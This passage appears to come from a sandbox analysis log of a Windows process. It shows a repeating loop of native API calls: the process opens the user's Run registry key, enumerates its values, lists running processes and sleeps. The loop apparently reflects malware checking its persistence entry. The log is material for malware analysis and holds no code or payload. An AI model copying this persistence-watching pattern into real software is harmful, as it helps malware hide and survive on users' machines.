Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.006] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.006] NtClose (Handle=0x154) returned 0x0 [0182.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.007] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.007] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.009] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.010] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.021] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.021] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.021] NtClose (Handle=0x154) returned 0x0 [0182.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.022] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.022] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.024] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.025] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.037] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.037] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.037] NtClose (Handle=0x154) returned 0x0 [0182.037] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.038] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.038] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.040] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.041] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.052] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.052] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.053] NtClose (Handle=0x154) returned 0x0 [0182.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.053] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.056] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.056] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.069] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.069] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.069] NtClose (Handle=0x154) returned 0x0 [0182.069] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.070] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.070] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.072] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.073] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.084] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.084] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.084] NtClose (Handle=0x154) returned 0x0 [0182.084] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.084] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.085] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.085] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.085] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.088] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.088] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.099] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.099] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.099] NtClose (Handle=0x154) returned 0x0 [0182.100] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.100] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.101] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.101] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.103] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.103] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.119] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.119] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.119] NtClose (Handle=0x154) returned 0x0 [0182.119] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.120] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.122] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.123] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.171] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.172] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.172] NtClose (Handle=0x154) returned 0x0 [0182.172] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.173] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.173] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.175] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.177] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.177] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.177] NtClose (Handle=0x154) returned 0x0 [0182.177] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.178] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.178] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.178] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.180] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.180] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.193] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.193] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.193] NtClose (Handle=0x154) returned 0x0 [0182.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.193] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.194] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.195] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.196] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.220] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.220] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.220] NtClose (Handle=0x154) returned 0x0 [0182.220] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.221] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.221] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.221] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.225] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.225] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.242] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.242] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.242] NtClose (Handle=0x154) returned 0x0 [0182.242] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.243] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.245] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.246] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.255] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.255] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.255] NtClose (Handle=0x154) returned 0x0 [0182.255] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.256] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.256] 